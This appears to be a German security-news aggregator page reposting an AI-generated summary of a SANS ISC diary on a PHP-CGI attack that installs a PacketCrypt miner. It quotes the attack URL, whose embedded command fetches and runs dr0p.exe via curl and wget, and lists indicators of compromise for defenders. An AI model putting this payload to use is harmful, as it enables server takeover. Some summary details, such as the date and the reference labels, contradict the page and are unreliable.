Cookie Consent by Free Privacy Policy Generator 🔒 PacketCrypt Classic Cryptocurrency Miner on PHP Servers, (Tue, Jan 7th) | 📰 IT Security – TSECURITY.DE Zum Hauptinhalt springen
📡 Themen-Radar Matrix
🔍
📡 Letzte Suchanfragen & News 🔍 Alle Such-Trends
📡 Thema: Penetration Testing 7.557 Anfragen
🔍 Alle Ergebnisse zu "Penetration Testing" ↗
📡 Thema: 2FA 8.633 Anfragen
🔍 Alle Ergebnisse zu "2FA" ↗
Echtzeit-Artikel Lesen ➔
📰 IT Security Nachrichten 09.08.2026 23:15
AI-Powered Browser Just Generates Every Website From Scratch
Echtzeit-Artikel Lesen ➔
📡 Thema: Passwort Sicherheit 8.435 Anfragen
🔍 Alle Ergebnisse zu "Passwort Sicherheit" ↗
📡 Thema: Zins 97 Anfragen
🔍 Alle Ergebnisse zu "Zins" ↗
Echtzeit-Artikel Lesen ➔
Echtzeit-Artikel Lesen ➔
Echtzeit-Artikel Lesen ➔
📡 Thema: DDoS 11.875 Anfragen
🔍 Alle Ergebnisse zu "DDoS" ↗
📡 Thema: Politik 104 Anfragen
🔍 Alle Ergebnisse zu "Politik" ↗
📰 IT Security Nachrichten 09.08.2026 17:00
Peinlich oder notwendig? Der Social-Media-Wahn der Politik
Echtzeit-Artikel Lesen ➔
📰 IT Security Nachrichten 08.08.2026 06:00
Die besten Smartphones mit langer Akkulaufzeit im Test
Echtzeit-Artikel Lesen ➔
📡 Thema: DSGVO 8.533 Anfragen
🔍 Alle Ergebnisse zu "DSGVO" ↗
Themen-Radar Powered by tsecurity.de
EILMELDUNGENLIVE
🔧 AI Nachrichten Anthropic is turning Claude Code’s auto mode on by default(09.08.2026 um 21:20 Uhr)
🎥 Video | YoutubeAI Agents Just Got WAY More Powerful (Zapier MCP Tutorial)(10.08.2026 um 03:16 Uhr)
🔧 AI Nachrichten Anthropic is turning Claude Code’s auto mode on by default(09.08.2026 um 21:20 Uhr)
🎥 Video | YoutubeAI Agents Just Got WAY More Powerful (Zapier MCP Tutorial)(10.08.2026 um 03:16 Uhr)

📰 IT Security
⚡ iShareStuff Intelligence
📰 VERIFIED NEWS INTELLIGENCE ID: #2507736

🛡️ PacketCrypt Classic Cryptocurrency Miner on PHP Servers, (Tue, Jan 7th)

⏱️ vor 580d 13h (07.01.2025 um 05:25 Uhr) 📖 1 Min. Lesezeit 📂 📰 IT Security 📡 Feed 🔗 Quelle: isc.sans.edu
Schrift:
🤖

AI Executive Summary & Key Takeaways

⚡ Verified Intelligence
<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr><p><strong>Title: PacketCrypt Classic Cryptocurrency Miner Exploits Vulnerable PHP Servers (Jan 15, 2025)</strong> </p>
<p><strong>Overview:</strong><br />
A cybersecurity alert has been issued regarding the exploitation of vulnerable PHP servers to mine <strong>PacketCrypt Classic (PKTC)</strong> cryptocurrency. The attack leverages a malicious URL that downloads and executes a remote payload, potentially compromising systems and draining resources for mining purposes. This incident highlights the risks associated with unpatched or misconfigured web servers. </p>
<hr />
<p><strong>Discovery and Exploit Details:</strong><br />
The SANS DShield project detected a suspicious URL:<br />
<code>/cgi-bin/php-cgi.exe?arg=Content-Type: text/plain &lt;?php system('curl -L -k -O http://[redacted]/dr0p.exe &amp;&amp; ./dr0p.exe || wget --no-check-certificate http://[redacted]/dr0p.exe &amp;&amp; ...</code> </p>
<p>This URL, when accessed, downloads and executes a malicious file named <strong>dr0p.exe</strong>, which is linked to the <strong>PacketCrypt Classic (PKTC)</strong> mining operation. The exploit targets PHP servers with known vulnerabilities or misconfigurations that allow unrestricted public access to execution environments. </p>
<p><strong>Malware Analysis:</strong><br />
- <strong>dr0p.exe</strong>: A backdoor designed to download and run a secondary payload, likely for cryptocurrency mining. Its SHA256 hash is:<br />
<code>d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36</code> </p>
<ul>
<li>
<p><strong>pkt1.exe</strong>: Another malicious component with hash:<br />
<code>e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562</code> </p>
</li>
<li>
<p><strong>packetcrypt.exe</strong>: A broader mining tool with hash:<br />
<code>717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397</code> </p>
</li>
</ul>
<p>The malware connects to an IP address <strong>23.27.51.244</strong>, which is associated with the <strong>EvilBit Block Explorer</strong> (port 80) and has open ports for SSH, HTTP, and mining-related traffic (ports 22, 80, 110, 6664). </p>
<hr />
<p><strong>Wallet Activity and Implications:</strong><br />
The malicious payload was observed to interact with a <strong>PKTC wallet address</strong>:<br />
<code>pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a</code> </p>
<p>According to the PKTC blockchain explorer, this wallet has accumulated <strong>5 PKTC</strong> (approximately <strong>0.0021785 USDT</strong> as of current exchange rates). This suggests the attacker is using the compromised servers for mining operations, which could be part of a larger scheme to generate cryptocurrency for illicit purposes or network disruption. </p>
<hr />
<p><strong>Background on PacketCrypt Classic (PKTC):</strong><br />
- <strong>PKTC (PacketCrypt Classic)</strong>: A legacy proof-of-work cryptocurrency that transitioned to a stake-based model in 2023, now known as the <strong>PKT project</strong>.<br />
- <strong>Key Difference</strong>: PKTC is the older version of the cryptocurrency, while the current PKT uses a "Stake-to-Earn" mechanism. The malware targets PKTC, which remains active for historical or legacy purposes. </p>
<hr />
<p><strong>Indicators of Compromise (IoCs):</strong><br />
1. <strong>IP Address</strong>: <code>23.27.51.244</code><br />
2. <strong>Malware Hashes</strong>:<br />
- dr0p.exe: <code>d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36</code><br />
- pkt1.exe: <code>e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562</code><br />
- packetcrypt.exe: <code>717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397</code><br />
3. <strong>Wallet Address</strong>: <code>pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a</code> </p>
<hr />
<p><strong>Recommendations for System Administrators:</strong><br />
- <strong>Audit PHP Servers</strong>: Ensure all servers are patched against known vulnerabilities (e.g., PHP remote code execution flaws).<br />
- <strong>Restrict Execution Permissions</strong>: Limit access to <code>cgi-bin/</code> or <code>php-cgi.exe</code> to authorized users only.<br />
- <strong>Monitor Network Traffic</strong>: Track connections to suspicious IP addresses and ports, especially those associated with mining software. </p>
<hr />
<p><strong>References:</strong><br />
1. <a href="https://www.virustotal.com/gui/file/d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36">VirusTotal Analysis</a><br />
2. <a href="https://crypto.pkt.cash/announcements/pktclassic-adopts-new-ticker-pktc/">PKTC Wallet Explorer</a><br />
3. <a href="https://www.pkt.world/explorer?wallet=pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a&amp;minutes=1440&amp;pools=all">PKT Classic to PKT Transition</a> </p>
<p><strong>Author:</strong> Yee Ching Tok, Ph.D., ISC Handler | SANS DShield Team </p>
<hr />
<p><em>Note: This alert is based on analysis of the SANS DShield project and does not confirm active exploitation. System administrators are urged to prioritize server security to prevent such incidents.</em></p><!-- END: Dynamically Added Content -->

&lt;!-- wp:paragraph --&gt;The SANS DShield project receives a wide variety of logs submitted by participants of the DShield project. Looking at the “” URLs page, I observed an interesting URL and dived deeper to investigate. The URL recorded is as follows:

🤖 KI News & Trend-Synthese Verifizierte Zusammenfassung

<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr><p><strong>Title: PacketCrypt Classic Cryptocurrency Miner Exploits Vulnerable PHP Servers (Jan 15, 2025)</strong> </p>
<p><strong>Overview:</strong><br />
A cybersecurity alert has been issued regarding the exploitation of vulnerable PHP servers to mine <strong>PacketCrypt Classic (PKTC)</strong> cryptocurrency. The attack leverages a malicious URL that downloads and executes a remote payload, potentially compromising systems and draining resources for mining purposes. This incident highlights the risks associated with unpatched or misconfigured web servers. </p>
<hr />
<p><strong>Discovery and Exploit Details:</strong><br />
The SANS DShield project detected a suspicious URL:<br />
<code>/cgi-bin/php-cgi.exe?arg=Content-Type: text/plain &lt;?php system('curl -L -k -O http://[redacted]/dr0p.exe &amp;&amp; ./dr0p.exe || wget --no-check-certificate http://[redacted]/dr0p.exe &amp;&amp; ...</code> </p>
<p>This URL, when accessed, downloads and executes a malicious file named <strong>dr0p.exe</strong>, which is linked to the <strong>PacketCrypt Classic (PKTC)</strong> mining operation. The exploit targets PHP servers with known vulnerabilities or misconfigurations that allow unrestricted public access to execution environments. </p>
<p><strong>Malware Analysis:</strong><br />
- <strong>dr0p.exe</strong>: A backdoor designed to download and run a secondary payload, likely for cryptocurrency mining. Its SHA256 hash is:<br />
<code>d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36</code> </p>
<ul>
<li>
<p><strong>pkt1.exe</strong>: Another malicious component with hash:<br />
<code>e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562</code> </p>
</li>
<li>
<p><strong>packetcrypt.exe</strong>: A broader mining tool with hash:<br />
<code>717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397</code> </p>
</li>
</ul>
<p>The malware connects to an IP address <strong>23.27.51.244</strong>, which is associated with the <strong>EvilBit Block Explorer</strong> (port 80) and has open ports for SSH, HTTP, and mining-related traffic (ports 22, 80, 110, 6664). </p>
<hr />
<p><strong>Wallet Activity and Implications:</strong><br />
The malicious payload was observed to interact with a <strong>PKTC wallet address</strong>:<br />
<code>pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a</code> </p>
<p>According to the PKTC blockchain explorer, this wallet has accumulated <strong>5 PKTC</strong> (approximately <strong>0.0021785 USDT</strong> as of current exchange rates). This suggests the attacker is using the compromised servers for mining operations, which could be part of a larger scheme to generate cryptocurrency for illicit purposes or network disruption. </p>
<hr />
<p><strong>Background on PacketCrypt Classic (PKTC):</strong><br />
- <strong>PKTC (PacketCrypt Classic)</strong>: A legacy proof-of-work cryptocurrency that transitioned to a stake-based model in 2023, now known as the <strong>PKT project</strong>.<br />
- <strong>Key Difference</strong>: PKTC is the older version of the cryptocurrency, while the current PKT uses a "Stake-to-Earn" mechanism. The malware targets PKTC, which remains active for historical or legacy purposes. </p>
<hr />
<p><strong>Indicators of Compromise (IoCs):</strong><br />
1. <strong>IP Address</strong>: <code>23.27.51.244</code><br />
2. <strong>Malware Hashes</strong>:<br />
- dr0p.exe: <code>d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36</code><br />
- pkt1.exe: <code>e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562</code><br />
- packetcrypt.exe: <code>717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397</code><br />
3. <strong>Wallet Address</strong>: <code>pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a</code> </p>
<hr />
<p><strong>Recommendations for System Administrators:</strong><br />
- <strong>Audit PHP Servers</strong>: Ensure all servers are patched against known vulnerabilities (e.g., PHP remote code execution flaws).<br />
- <strong>Restrict Execution Permissions</strong>: Limit access to <code>cgi-bin/</code> or <code>php-cgi.exe</code> to authorized users only.<br />
- <strong>Monitor Network Traffic</strong>: Track connections to suspicious IP addresses and ports, especially those associated with mining software. </p>
<hr />
<p><strong>References:</strong><br />
1. <a href="https://www.virustotal.com/gui/file/d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36">VirusTotal Analysis</a><br />
2. <a href="https://crypto.pkt.cash/announcements/pktclassic-adopts-new-ticker-pktc/">PKTC Wallet Explorer</a><br />
3. <a href="https://www.pkt.world/explorer?wallet=pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a&amp;minutes=1440&amp;pools=all">PKT Classic to PKT Transition</a> </p>
<p><strong>Author:</strong> Yee Ching Tok, Ph.D., ISC Handler | SANS DShield Team </p>
<hr />
<p><em>Note: This alert is based on analysis of the SANS DShield project and does not confirm active exploitation. System administrators are urged to prioritize server security to prevent such incidents.</em></p><!-- END: Dynamically Added Content -->

🛡️ Security Insights teilen – Wissen & Abwehr stärken

Verwandte Videos & News · KI-empfohlen via Levenshtein-Match

2/22/18 Text Help Compromised: Cryptocurrency Miner Hidden in Code | AT&amp;T ThreatTraq
🎯 53% Match
2/22/18 Text Help Compromised: Cryptocurrency Miner Hidden in Code | AT&amp;T ThreatTraq
📆 22.02.2018 um 14:45 Uhr ▶ Abspielen
The Impacts Of Cryptocurrency - Nicholas Weaver - PSW #829
🎯 50% Match
The Impacts Of Cryptocurrency - Nicholas Weaver - PSW #829
📆 17.05.2024 um 01:33 Uhr ▶ Abspielen
Ransoming and clipping for illicit cryptocurrency gains Chetan Raghuprasad (Cisco Talos)
🎯 40% Match
Ransoming and clipping for illicit cryptocurrency gains Chetan Raghuprasad (Cisco Talos)
📆 07.11.2023 um 09:28 Uhr ▶ Abspielen
The Zcash anonymous cryptocurrency (33c3) - deutsche Übersetzung
🎯 40% Match
The Zcash anonymous cryptocurrency (33c3) - deutsche Übersetzung
📆 30.12.2016 um 10:58 Uhr ▶ Abspielen
DEF CON 33 Preview - Cryptocurrency Preview
🎯 38% Match
DEF CON 33 Preview - Cryptocurrency Preview
📆 01.08.2025 um 14:43 Uhr ▶ Abspielen
5 ways hackers can hack cryptocurrency wallets!
🎯 35% Match
5 ways hackers can hack cryptocurrency wallets!
📆 07.02.2025 um 12:00 Uhr ▶ Abspielen
5 ways hackers can hack cryptocurrency wallets!
🎯 35% Match
5 ways hackers can hack cryptocurrency wallets!
📆 07.02.2025 um 12:00 Uhr ▶ Abspielen
Building a classic Macintosh with a Raspberry Pi Pico
🎯 35% Match
Building a classic Macintosh with a Raspberry Pi Pico
📆 27.09.2024 um 16:00 Uhr ▶ Abspielen

← Horizontal scrollen für mehr Empfehlungen → · Klick auf ein Video zum Abspielen im Hauptplayer

Ähnliche Beiträge
🔍 Verwandte News
🔗

Auch interessante Nachrichten PacketCrypt Classic Cryptocurrency Miner on PHP Servers, (Tue, Jan 7th)

Thematisch verwandte Begriffe: PacketCrypt, Classic, Cryptocurrency, Miner · 6 Treffer

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...